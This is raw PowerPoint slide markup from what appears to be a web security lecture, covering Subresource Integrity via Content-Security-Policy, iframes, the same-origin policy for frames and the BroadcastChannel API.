            <a:off x="9436760" y="2207480"/>
            <a:ext cx="942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biz.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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29D10AF-2375-704F-ACDB-E5478D5C8995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3780120" y="2854840"/>
            <a:ext cx="484094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9FD9DE74-A6D2-644A-BFC7-C77C3634F9FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4254719" y="2981469"/>
            <a:ext cx="566693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HTTP/1.1 200 OK </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Content-Security-Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>require-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>sri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>-for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> script style; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangular Callout 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E9E2CB3-CD84-674A-92DC-65FA22D16902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2094891" y="4759841"/>
            <a:ext cx="6878988" cy="933917"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31715"/>
              <a:gd name="adj2" fmla="val -13146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Requires SRI for all scripts and style sheets on page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3676864811"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E75579A4-2ED2-5342-BC30-C33B8EB120A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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72706" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9011B6E2-795E-994D-9EFD-0F85677A42A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066801" y="2156907"/>
            <a:ext cx="4966446" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Browser window may contain frames from different origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>frame: rigid division as part of frameset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>iframe: floating inline frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207876" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16031848-1A5C-D746-AB18-FC795666EF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52562" y="4939731"/>
            <a:ext cx="5428129" cy="10668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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;IFRAME SRC="hello.html" WIDTH=450 HEIGHT=100&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>If you can see this, your browser doesn't understand IFRAME. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;/IFRAME&gt;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CC4B2F4-934A-704C-B07B-6D8250AEF9E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5952562" y="2180936"/>
            <a:ext cx="573741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2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Delegate screen area to content from another source (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, advertising)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Browser provides isolation based on frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Parent may work even if frame is broken</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="iFrame Allow">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAF4C51-8038-144E-A007-8DBBFDDF7B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6894" y="3966943"/>
            <a:ext cx="3579906" cy="2237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039359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Content Placeholder 24" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22BDA5A6-4E7D-6A40-9AD2-B0699558F0CB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145679" y="2334560"/>
            <a:ext cx="5105397" cy="3655795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Each frame of a page has an origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Origin = protocol://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>domain:port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Frame can access objects from its own origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Network access, read/write DOM, cookies and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Frame cannot access objects associated with other origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73730" name="laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3111BEBA-C6BB-164A-B942-38D7BFBDA13F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="528917" y="2409825"/>
            <a:ext cx="3657600" cy="2667000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T1" fmla="*/ 0 h 21600"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T5" fmla="*/ 0 h 21600"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T9" fmla="*/ 0 h 21600"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T12" fmla="*/ 0 w 21600"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T15" fmla="*/ 2147483646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4445 w 21600"/>
              <a:gd name="T25" fmla="*/ 1858 h 21600"/>
              <a:gd name="T26" fmla="*/ 17311 w 21600"/>
              <a:gd name="T27" fmla="*/ 12323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 extrusionOk="0">
                <a:moveTo>
                  <a:pt x="3362" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18327" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18327" y="14347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3362" y="14347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3362" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="3340" y="15068"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="19877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="19877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18327" y="15068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3340" y="15068"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="19877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19877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19877"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="4186" y="1523"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17547" y="1523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17547" y="12744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4186" y="12744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4186" y="1523"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="3318" y="15549"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2917" y="16110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18727" y="16110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18327" y="15549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3318" y="15549"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="6213" y="18314"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5946" y="18875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15766" y="18875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15499" y="18314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6213" y="18314"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="2828" y="16471"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2405" y="17072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19284" y="17072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18839" y="16471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2828" y="16471"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="2316" y="17352"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1871" y="17953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19863" y="17953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19395" y="17352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2316" y="17352"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="C0C0C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1B58BDA-0E37-014C-A370-419958D92396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367117" y="2638426"/>
            <a:ext cx="990600" cy="120032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2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Can 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE3D729-84F1-F34A-A049-9E37A9F01618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4643717" y="2274888"/>
            <a:ext cx="990600" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="can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 algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Can 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB106C28-7F0A-D34D-B300-FCBE7259E35D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4659592" y="3695700"/>
            <a:ext cx="990600" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="can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 algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>B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46E9853-D4D0-8945-BDFC-822197CE6D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13030200" y="3105150"/>
            <a:ext cx="76200" cy="460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DBA5BBA-2A07-AB48-9E55-4FC0E54D1C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2433917" y="2638426"/>
            <a:ext cx="990600" cy="120032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txBody>
          <a:bodyPr wrap="square"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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt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BB5E608-D34A-0E40-985B-279B478CB0B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700617" y="3019426"/>
            <a:ext cx="495300" cy="46196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2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73737" name="Line 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30488340-B89B-CC48-A98A-490DCCEB2CF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3272118" y="3778250"/>
            <a:ext cx="1387475" cy="469900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="969696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296" tIns="41148" rIns="82296" bIns="41148"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73738" name="Line 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A9CE47-A9ED-9D42-BC78-1641199E2F7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157818" y="2827338"/>
            <a:ext cx="1501775" cy="317500"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="969696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296" tIns="41148" rIns="82296" bIns="41148"/>
          <a:lstStyle/>
          <a:p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6500448-2780-EF42-AC1A-BB9EF6553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Same Origin Policy for Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="436112334"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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5" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E733DAF-C9C7-4D4C-917D-93B4CBA3ECC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BroadcastChannel API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82946" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20C85344-CAD7-F44F-BCB9-57CA5DD6D0D3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066799" y="2103120"/>
            <a:ext cx="3969875" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Script can send messages to other browsing contexts (windows, frames, etc.) in the same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Publish/subscribe message bus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82948" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD85591B-B303-A844-96DA-683D731FE9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36674" y="2103120"/>
            <a:ext cx="6796741" cy="3267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157163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 defTabSz="157163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 defTabSz="157163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 defTabSz="157163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 defTabSz="157163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defTabSz="1571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defTabSz="1571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defTabSz="1571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defTabSz="1571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ts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D81B60"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>// Connect to the channel named "</a:t>
